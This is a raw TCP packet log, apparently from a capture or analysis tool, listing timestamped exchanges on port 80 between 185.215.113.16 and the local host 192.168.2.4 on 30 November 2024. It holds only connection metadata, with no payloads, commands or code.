Nov 30, 2024 04:06:28.423846006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.423907042 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.423945904 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.424000025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.424990892 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.425035954 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.425368071 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.425410032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.425471067 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.425512075 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.426506996 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.426553011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.426606894 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.426651001 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.427635908 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.427680969 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.427685022 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.427733898 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.428750038 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.428793907 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.428858995 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.428901911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.429888010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.429933071 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.429992914 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.430037975 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.431035995 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.431080103 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.431154966 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.431200027 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.432152987 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.432199001 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.432241917 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.432290077 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.433264017 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.433304071 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.433371067 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.433417082 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.434403896 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.434449911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.434523106 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.434570074 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.435561895 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.435610056 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.435664892 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.435713053 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.436671972 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.436711073 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.436785936 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.436832905 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.437793970 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.437839031 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.437871933 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.437911034 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.438932896 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.438982010 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.439120054 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.439167023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.440054893 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.440109968 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.440140963 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.440181017 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.441184044 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.441257954 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.441286087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.441337109 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.442295074 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.442363024 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.442399025 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.442450047 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.443428993 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.443483114 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.443527937 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.443577051 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.444566965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.444624901 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.444664955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.444725037 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.445688963 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.445735931 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.445787907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.445836067 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.446810007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.446858883 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.446923971 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.446968079 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.447959900 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.448005915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.448069096 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.448121071 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.449070930 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.449116945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.449182987 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.449224949 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.450218916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.450264931 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.450320959 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.450365067 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.451347113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.451396942 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.451437950 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.451482058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.452462912 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.452517033 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.452569008 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.452610970 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.453593016 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.453634977 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.453699112 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.453735113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.454715967 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.454768896 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.454808950 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.454855919 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.455838919 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.455893993 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.456005096 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.456047058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.456981897 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.457041025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.457061052 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.457107067 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.458086014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.458131075 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.458185911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.458230019 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.459211111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.459260941 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.459309101 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.459352016 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.460365057 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.460410118 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.460459948 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.460505962 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.461486101 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.461527109 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.461570978 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.461610079 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.462599993 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.462651968 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.462692022 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.462733984 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.463745117 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.463798046 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.463839054 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.463880062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.464854002 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.464895964 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.464941978 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.464983940 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.465979099 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.466021061 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.466095924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.466140032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.467143059 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.467196941 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.467221022 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.467273951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.468265057 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.468312025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.468379974 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.468421936 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.469453096 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.469495058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.469520092 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.469567060 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.470496893 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.470544100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.470604897 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.470648050 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.471638918 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.471685886 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.471721888 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.471770048 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.472752094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.472796917 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.472852945 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.472894907 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.473880053 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.473926067 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.473992109 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.474041939 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.475011110 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.475054979 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.475070000 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.475114107 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.476129055 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.476175070 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.476232052 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.476274014 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.477251053 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.477294922 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.477354050 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.477397919 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.478367090 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.478410006 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.478470087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.478512049 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.479516029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.479558945 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.479562044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.479609966 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.480670929 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.480715990 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.480739117 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.480778933 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.481777906 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.481825113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.481834888 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.481883049 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.624810934 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.624897003 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.624898911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.624943972 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.625296116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.625349998 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.625396967 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.625443935 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.626391888 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.626452923 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.626808882 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.626866102 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.626907110 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.626946926 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.627970934 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.628030062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.628068924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.628115892 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.629065037 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.629122972 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.629183054 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.629231930 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.630347013 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.630405903 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.630445004 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.630491972 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.631325960 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.631386995 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.631429911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.631479025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.632451057 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.632510900 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.632550955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.632600069 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.633572102 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.633632898 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.633745909 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.633797884 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.634720087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.634778023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.634818077 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.634865999 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.635848999 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.635907888 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.635946989 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.635998011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.636960030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.637073994 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.637315035 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.638092041 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.638154984 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.638202906 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.638252974 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.639235973 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.639298916 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.639343023 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.639395952 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.640362024 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.640424013 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.640470028 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.640522003 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.641464949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.641530991 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.641603947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.641665936 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.642611027 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.642674923 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.642715931 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.642769098 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.643739939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.643800974 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.643938065 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.643995047 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.644889116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.644972086 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.644989014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.645057917 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.645989895 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.646055937 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.646094084 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.646147966 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.647120953 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.647171021 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.647234917 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.647293091 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.648241043 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.648288012 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.648356915 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.648403883 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.649357080 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.649404049 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.649473906 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.649518013 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.650486946 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.650537014 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.650593042 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.650643110 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.651618004 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.651665926 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.651719093 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.651765108 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.652735949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.652781010 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.652789116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.652834892 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.653901100 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.653945923 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.653981924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.654027939 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.655052900 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.655096054 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.655098915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.655142069 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.656142950 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.656188011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.656256914 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.656307936 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.657269955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.657314062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.657373905 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.657416105 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.658386946 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.658444881 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.658485889 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.658540964 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.659519911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.659564972 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.659591913 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.659610033 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.660625935 CET	80	49800	185.215.113.16	192.168.2.4
